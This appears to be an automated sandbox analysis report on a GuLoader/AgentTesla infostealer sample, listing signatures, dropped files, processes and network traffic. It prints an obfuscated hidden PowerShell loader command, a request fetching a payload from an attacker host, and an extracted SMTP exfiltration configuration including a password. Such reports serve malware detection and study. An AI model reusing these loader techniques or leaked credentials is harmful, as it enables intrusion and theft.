Windows Analysis Report
PI.1.exe

Overview

General Information

Sample name: PI.1.exe
Analysis ID: 1410985
MD5: fc8b93107558429854146361da62e618
SHA1: e4a2de78806dbc296ac97505f097e077e798ddf3
SHA256: f27ddc5f225f50a392bfcf9cbd59557d445f5ad47f1ad31f1a899aec1ec92611
Tags: exe

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected GuLoader
Installs a global keyboard hook
Obfuscated command line found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: PI.1.exe.7504.0.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.scootero.cl", "Username": "sending01@scootero.cl", "Password": "Dangote1235$"}
Source: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe ReversingLabs: Detection: 18%
Source: PI.1.exe ReversingLabs: Detection: 18%
Source: PI.1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.128.228.214:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49716 version: TLS 1.2
Source: PI.1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007BCF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbK source: powershell.exe, 00000003.00000002.1570017058.0000000008B15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000003.00000002.1561312536.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1569685053.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000003.00000002.1561312536.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbE source: powershell.exe, 00000003.00000002.1567339564.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1561312536.000000000344D000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040635D FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_004027FB FindFirstFileW
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\

Networking

Source: Traffic Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.11:49718 -> 177.221.140.242:587
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.11:49718 -> 177.221.140.242:587
Source: Traffic Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.11:49718 -> 177.221.140.242:587
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.11:49718 -> 177.221.140.242:587
Source: global traffic TCP traffic: 192.168.2.11:49717 -> 177.221.140.242:587
Source: Joe Sandbox View IP Address: 104.128.228.214
Source: Joe Sandbox View IP Address: 177.221.140.242
Source: Joe Sandbox View IP Address: 104.26.13.205
Source: Joe Sandbox View ASN Name: GRUPOCGLIMITADACL
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: api.ipify.org
Source: global traffic HTTP traffic detected:
    GET /xpQuIygmcTEYHTAQJ248.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: apwisulsel.sa.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: apwisulsel.sa.com
Source: powershell.exe, 00000003.00000002.1567339564.0000000007BCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: wab.exe, 0000000D.00000002.2529559166.00000000207CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2529559166.0000000020737000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.scootero.cl
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1562042831.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000003.00000002.1562042831.0000000005211000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2529559166.00000000206C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wab.exe, 0000000D.00000002.2529559166.00000000207CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2529559166.0000000020737000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://scootero.cl
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000003.00000002.1562042831.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1562042831.0000000005211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB_q
Source: wab.exe, 0000000D.00000002.2529559166.00000000206C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: wab.exe, 0000000D.00000002.2529559166.00000000206C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: wab.exe, 0000000D.00000002.2529559166.00000000206C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: wab.exe, 0000000D.00000002.2515992871.0000000004AEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apwisulsel.sa.com/
Source: wab.exe, 0000000D.00000002.2515992871.0000000004AEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apwisulsel.sa.com/cM
Source: wab.exe, 0000000D.00000002.2516475429.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2515992871.0000000004B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apwisulsel.sa.com/xpQuIygmcTEYHTAQJ248.bin
Source: wab.exe, 0000000D.00000002.2515992871.0000000004AEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apwisulsel.sa.com/xpQuIygmcTEYHTAQJ248.bing
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: PI.1.exe, PI.1.exe.3.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000003.00000002.1562042831.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1565231609.000000000627E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_004066E2
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_00404AF5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0514F3F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0514F0B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205BE399
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205BAA33
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205B4A98
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205B3E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205B41C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_22EACC84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_22EA1F0B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_2346B200
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_2346C178
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23463040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_234665D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23465580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23462348
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_2346E3A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23460006
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23467680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_23465CBB
Source: PI.1.exe Static PE information: invalid certificate
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PI.1.exe Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/17@3/3
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_00404579 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_00402095 CoCreateInstance
Source: C:\Users\user\Desktop\PI.1.exe File created: C:\Users\user\AppData\Roaming\dyrekllers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Users\user\Desktop\PI.1.exe File created: C:\Users\user\AppData\Local\Temp\nso6E1E.tmp
Source: PI.1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\PI.1.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PI.1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\PI.1.exe File read: C:\Users\user\Desktop\PI.1.exe
Source: unknown Process created: C:\Users\user\Desktop\PI.1.exe C:\Users\user\Desktop\PI.1.exe
Source: C:\Users\user\Desktop\PI.1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Users\user\Desktop\PI.1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: PI.1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
